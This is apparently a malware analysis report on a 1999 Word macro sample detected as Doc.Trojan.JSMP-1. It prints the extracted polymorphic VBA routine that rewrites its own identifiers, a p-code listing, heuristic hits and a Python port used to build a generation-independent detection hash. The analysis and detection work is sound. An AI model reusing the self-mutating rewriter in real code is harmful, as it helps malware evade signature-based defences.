Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d29b442ea0284e38…

MALICIOUS

Office (OLE)

Size: 93.5 KB
Created: 1999-12-02 13:25:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14
MD5: 8f3204e29093673ebc86aaafc0e1ff3b
SHA-1: 7a773e823c5a66cb7cb71ac98c25db3d30442750
SHA-256: d29b442ea0284e3826dd2145f21ecfdeaad4995c3b93fe6951436fd82297afb2
Risk score: 220

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The extracted ThisDocument module holds two procedures, Private Sub Test() and Private Function JSMP(OURCODE). Test() reads the module's own first 16 lines through ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 16), hands them to JSMP(), and shows the result in a MsgBox. JSMP() walks the seven identifiers named in its own string literal (JSMP, OURCODE, ALLVARIABLES, VARLOOP, NEWVAR, VARPOS, CURVAR), builds a random six-character replacement for each from Chr(130) through Chr(203), and substitutes it throughout the code, including inside that literal. The output is therefore a new, self-consistent generation of the same routine with different identifier names: a polymorphic macro engine of the Word 97 era (the file was created 1999-12-02 with Word 8.0), consistent with the ClamAV signature Doc.Trojan.JSMP-1. The source itself is plain, which is why the platform rates obfuscation as unlikely; what it obfuscates is its own next generation.

Points to weigh before escalating: the macro as extracted has no auto-execution entry point (no AutoOpen or Document_Open), no Shell, WScript, network, download or file-writing code, and a MsgBox as its only visible effect, so nothing in it supports a second-stage payload or an exploit (the T1203 tag has no backing in the extracted code). Test() runs only when invoked by hand, and on current Office versions its VBProject access fails unless "Trust access to the VBA project object model" is enabled. Rnd is never seeded with Randomize, so the first generation produced in a fresh Word session is reproducible. The SC_STR_WSCRIPT and SE_CLIPBOARD_COMMAND_LURE hits do not come from this macro source, which contains neither string; they must originate elsewhere in the OLE file (document text or other streams) and should be confirmed there before the clipboard-lure theory is accepted. The pcodedmp listing below matches the decompressed source line for line (Test at lines #0 to #2, JSMP at #3 to #15), so there is no indication of VBA stomping.

Heuristics (4)

  • CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Doc.Trojan.JSMP-1
  • SC_STR_WSCRIPT (high): reference to Windows Script Host
  • SE_CLIPBOARD_COMMAND_LURE (high): document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
  • OLE_VBA_MACROS (medium): document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3410 bytes
SHA-256: c6f536fadadf7fb54f4794cf4c9d0999af669492416facff85f342576c7c03d5
Detection: ClamAV Doc.Trojan.JSMP-1
Obfuscation or payload: unlikely
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Test()
MsgBox JSMP(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 16))
End Sub
Private Function JSMP(OURCODE)
ALLVARIABLES = "JSMP OURCODE ALLVARIABLES VARLOOP NEWVAR VARPOS CURVAR "
For VARLOOP = 0 To 6
CURVAR = Left(ALLVARIABLES, InStr(ALLVARIABLES, Chr(32)) - 1)
ALLVARIABLES = Mid(ALLVARIABLES, InStr(ALLVARIABLES, Chr(32)) + 1)
NEWVAR = Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130))
Do
VARPOS = InStr(VARPOS + 1, OURCODE, CURVAR)
If VARPOS Then OURCODE = Mid(OURCODE, 1, (VARPOS - 1)) & NEWVAR & Mid(OURCODE, (VARPOS + Len(CURVAR)))
Loop While VARPOS
Next
JSMP = OURCODE
End Function

' Processing file: /tmp/qstore_isuz6ymn
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 69917 bytes
' Line #0:
' 	FuncDefn (Private Sub Test())
' Line #1:
' 	LitDI2 0x0001 
' 	LitDI2 0x0010 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	ArgsLd JSMP 0x0001 
' 	ArgsCall MsgBox 0x0001 
' Line #2:
' 	EndSub 
' Line #3:
' 	FuncDefn (Private Function JSMP(OURCODE, id_FFFE As Variant))
' Line #4:
' 	LitStr 0x0037 "JSMP OURCODE ALLVARIABLES VARLOOP NEWVAR VARPOS CURVAR "
' 	St ALLVARIABLES 
' Line #5:
' 	StartForVariable 
' 	Ld VARLOOP 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	LitDI2 0x0006 
' 	For 
' Line #6:
' 	Ld ALLVARIABLES 
' 	Ld ALLVARIABLES 
' 	LitDI2 0x0020 
' 	ArgsLd Chr 0x0001 
' 	FnInStr 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd LBound 0x0002 
' 	St CURVAR 
' Line #7:
' 	Ld ALLVARIABLES 
' 	Ld ALLVARIABLES 
' 	LitDI2 0x0020 
' 	ArgsLd Chr 0x0001 
' 	FnInStr 
' 	LitDI2 0x0001 
' 	Add 
' 	ArgsLd Mid$ 0x0002 
' 	St ALLVARIABLES 
' Line #8:
' 	Ld Rnd 
' 	LitDI2 0x004A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0082 
' 	Add 
' 	Paren 
' 	ArgsLd Chr 0x0001 
' 	Ld Rnd 
' 	LitDI2 0x004A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0082 
' 	Add 
' 	Paren 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x004A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0082 
' 	Add 
' 	Paren 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x004A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0082 
' 	Add 
' 	Paren 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x004A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0082 
' 	Add 
' 	Paren 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x004A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0082 
' 	Add 
' 	Paren 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St NEWVAR 
' Line #9:
' 	Do 
' Line #10:
' 	Ld VARPOS 
' 	LitDI2 0x0001 
' 	Add 
' 	Ld OURCODE 
' 	Ld CURVAR 
' 	FnInStr3 
' 	St VARPOS 
' Line #11:
' 	Ld VARPOS 
' 	If 
' 	BoSImplicit 
' 	Ld OURCODE 
' 	LitDI2 0x0001 
' 	Ld VARPOS 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	ArgsLd Mid$ 0x0003 
' 	Ld NEWVAR 
' 	Concat 
' 	Ld OURCODE 
' 	Ld VARPOS 
' 	Ld CURVAR 
' 	FnLen 
' 	Add 
' 	Paren 
' 	ArgsLd Mid$ 0x0002 
' 	Concat 
' 	St OURCODE 
' 	EndIf 
' Line #12:
' 	Ld VARPOS 
' 	LoopWhile 
' Line #13:
' 	StartForVariable 
' 	Next 
' Line #14:
' 	Ld OURCODE 
' 	St JSMP 
' Line #15:
' 	EndFunc
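Added example, not part of this report and not code from the sample or the analysis platform: a Python port of the JSMP() rewriter shown above, run over the 16 lines that Test() feeds it, next to a name-insensitive "skeleton" hash. It shows why a byte or identifier signature on this routine breaks with every generation while a signature on the normalised structure does not. Assumptions: the seed parameter stands in for VBA's unseeded Rnd sequence, and the keyword list is limited to the tokens that occur in this macro.

```python
"""Port of the sample's JSMP() identifier rewriter plus a generation-independent
skeleton hash. Added example; MACRO_SRC is copied from the report, the rest is
our own code (assumptions: seed replaces VBA's Rnd, keyword set is this macro's)."""
import hashlib
import random
import re

# CodeModule.Lines(1, 16) of the ThisDocument module, copied from the report.
# The Attribute lines at the top of macros.bas are export metadata that
# CodeModule does not expose, so JSMP() never sees them.
MACRO_SRC = """Private Sub Test()
MsgBox JSMP(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 16))
End Sub
Private Function JSMP(OURCODE)
ALLVARIABLES = "JSMP OURCODE ALLVARIABLES VARLOOP NEWVAR VARPOS CURVAR "
For VARLOOP = 0 To 6
CURVAR = Left(ALLVARIABLES, InStr(ALLVARIABLES, Chr(32)) - 1)
ALLVARIABLES = Mid(ALLVARIABLES, InStr(ALLVARIABLES, Chr(32)) + 1)
NEWVAR = Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130))
Do
VARPOS = InStr(VARPOS + 1, OURCODE, CURVAR)
If VARPOS Then OURCODE = Mid(OURCODE, 1, (VARPOS - 1)) & NEWVAR & Mid(OURCODE, (VARPOS + Len(CURVAR)))
Loop While VARPOS
Next
JSMP = OURCODE
End Function
"""


def jsmp(code: str, seed: int) -> str:
    """Port of JSMP(): take the identifier list from the code's own string
    literal (the previous generation rewrote it to its current names), then
    replace each name everywhere, literal included, with six characters drawn
    from Chr(130)..Chr(203), i.e. Int(Rnd * 74) + 130. `seed` is an assumption
    standing in for VBA's Rnd state."""
    rng = random.Random(seed)
    literal = re.search(r'"([^"]*)"', code).group(1)
    # Split on Chr(32) only, as the VBA does: a generated name may contain
    # chr(160) (NBSP), which str.split() with no argument would treat as space.
    for cur in [n for n in literal.split(" ") if n]:
        new = "".join(chr(rng.randrange(130, 204)) for _ in range(6))
        code = code.replace(cur, new)
    return code


# Keywords and built-ins JSMP() never renames (only those used in this macro).
VBA_KEYWORDS = frozenset(w.lower() for w in (
    "Private Sub End Function For To Next Do Loop While If Then "
    "MsgBox Left Mid InStr Chr Int Rnd Len "
    "ThisDocument VBProject VBComponents CodeModule Lines").split())

# An identifier: ASCII as usual, or the \x82..\xCB range that JSMP() emits.
IDENT_RE = re.compile(r"[A-Za-z_\u0082-\u00cb][A-Za-z0-9_\u0082-\u00cb]*")


def skeleton(code: str) -> str:
    """Replace every non-keyword identifier with IDn, numbered by first
    appearance, so generations that differ only in names normalise to the
    same text. Keys are lower-cased because VBA identifiers are case-insensitive."""
    names: dict = {}

    def rename(m):
        tok = m.group(0)
        key = tok.lower()
        if key in VBA_KEYWORDS:
            return tok
        return names.setdefault(key, f"ID{len(names)}")

    return IDENT_RE.sub(rename, code)


def skeleton_hash(code: str) -> str:
    """SHA-256 of the normalised text: a fingerprint that survives JSMP()."""
    return hashlib.sha256(skeleton(code).encode("utf-8")).hexdigest()


def demo() -> dict:
    """Three generations: the plain hash changes each time, the skeleton hash never."""
    gen1 = jsmp(MACRO_SRC, seed=1)
    gen2 = jsmp(gen1, seed=2)
    plain = {hashlib.sha256(g.encode("utf-8")).hexdigest() for g in (MACRO_SRC, gen1, gen2)}
    skel = {skeleton_hash(g) for g in (MACRO_SRC, gen1, gen2)}
    return {"distinct_plain_hashes": len(plain), "distinct_skeleton_hashes": len(skel)}


if __name__ == "__main__":
    print(demo())
    print(skeleton(MACRO_SRC))
```

Running it prints {'distinct_plain_hashes': 3, 'distinct_skeleton_hashes': 1}: each generation is a fresh file hash, while the skeleton, which still pins the self-read through VBProject.VBComponents(...).CodeModule.Lines, the Chr(130..203) name generator and the Do/Loop While substitution, is identical. A detection written against that skeleton (or the equivalent pcodedmp opcode sequence, which names no identifiers at all) holds across generations; one written against "JSMP" or "OURCODE" matches only the first. For use beyond this sample, the keyword set would need the full VBA keyword and built-in list.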